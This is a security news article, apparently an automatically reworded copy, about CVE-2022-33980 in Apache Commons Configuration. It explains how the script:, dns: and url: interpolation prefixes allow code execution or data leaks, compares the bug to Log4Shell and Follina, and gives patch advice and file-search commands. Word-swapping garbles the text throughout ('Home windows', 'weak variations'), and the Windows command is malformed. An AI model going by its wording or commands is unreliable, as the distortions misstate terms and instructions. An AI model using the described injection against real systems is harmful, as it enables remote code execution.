[ad_1]
Bear in mind the Log4Shell bug that confirmed up in Apache Log4j late in 2021?
Log4j is without doubt one of the Apache Software program Basis’s many software program initiatives (greater than 350 at present rely), and it’s a programming library that Java coders can use to handle logfiles in their very own merchandise.
Logfiles are an important a part of growth, debugging, report conserving, program monitoring, and, in lots of trade sectors, of regulatory compliance.
Sadly, not all textual content you logged – even when it was despatched in by an exterior person, for instance as a username in a login type – was handled actually.
If you happen to gave your identify as MYNAME, it will be logged similar to that, because the textual content string MYNAME, however any textual content wrapped in ${…} characters was handled as a command for the logger to run, which might trigger what’s often called RCE, quick for distant code execution.
Just lately, we noticed the same form of bug referred to as Follina, which affected Microsoft Home windows.
There, the troublesome characters had been $(…), with spherical brackets changing squiggly ones, however with the identical form of side-effect.
Within the Follina bug, a URL that contained a listing identify with the string SOMETEXT in it will be handled simply because it was written, however any textual content wrapped in $(…) can be run as a Powershell command, as soon as once more inflicting a threat of distant code execution.
Extra hassle with brackets
Nicely, the bug CVE-2022-33980, which doesn’t have a catchy identify but, is a really related form of blunder within the Apache Commons Configuration toolkit.
The identify’s fairly a mouthful: Apache Commons is one other Apache venture that gives quite a few Java utilities (sub-projects, if you happen to like) that present a variety of helpful programming toolkits.
Certainly one of these is Commons Configuration, which lets Java apps work with configuration information of a variety of various codecs, together with XML, INI, plist, and lots of extra.
Because the venture itself says, “the Commons Configuration software program library offers a generic configuration interface which permits a Java utility to learn configuration information from a wide range of sources.”
Sadly, this software program treats textual content wrapped in ${…} specifically, too.
As a substitute of utilizing the textual content actually, the next particular “reprocessing” takes place, referred to reasonably confusingly within the jargon as interpolation:
$(script:STRING) runs STRING as a Java script and makes use of the output of that code.
$(dns:STRING) appears up STRING utilizing DNS.
$(url:STRING) reads the URL STRING and retrieves the textual content to make use of from there.
In different phrases, booby-trapped configuration information might, in idea, be used to run malicious code, leak information by way of DNS lookups, or fetch configuration settings from a rogue web site.
What to do?
Based on the Commons Configuration staff, this “interpolation” bug was launched in model 2.4 (launched in late 2018) and patched in model 2.8.0 (launched 2022-07-05, which is Tuesday this week).
All updates going again to model 2.2 in 2017 are listed as “minor releases”, so we’re assuming that updating from any of the weak variations 2.4, 2.5, 2.6 or 2.7 to the newest model must be uncontroversial.
So, when you’ve got any Java software program that makes use of the Apache Commons Configuration library, replace as quickly as you possibly can!
Oh, and if you happen to’re a programmer…
…whether or not you name it “command substitution”, “dwell rewriting”, “reprocessing” or “interpolation”, use it sparingly, and don’t flip it on by default for information you haven’t already verified that you would be able to belief.
Am I weak?
A fast approach to search for the presence of a possibly-vulnerable Commons Configuration library on a pc is to seek for filenames of the shape commons-configuration2-*.jar, the place * is a wildcard denoting “any textual content allowed right here”.
On Linux/Unix, strive:
$ discover / -type f -name ‘commons-configuration2-*.jar’
On Home windows, strive:
> DIR C:commons-configuration2-*.jar /S
Susceptible variations have the names:
commons-configuration2-2.4.jar
commons-configuration2-2.5.jar
commons-configuration2-2.6.jar
commons-configuration2-2.7.jar
Earlier or later variations don’t have the bug.
The most recent, patched, model, is:
commons-configuration2-2.8.0.jar
If you happen to discover information with names like this:
commons-configuration-1.9.jar
…these are the outdated (model 1) flavour of the library, which doesn’t have this bug.
Observe. The identify Apache refers back to the whole Software program Basis and all its initiatives. It’s not the identify of a webserver, in the identical method that Microsoft isn’t the identify of an working system. So, although web sites based mostly on the Apache Webserver, also called httpd, are sometimes called “working Apache”, this bug doesn’t apply to the online server, which is written in C, not in Java.
[ad_2]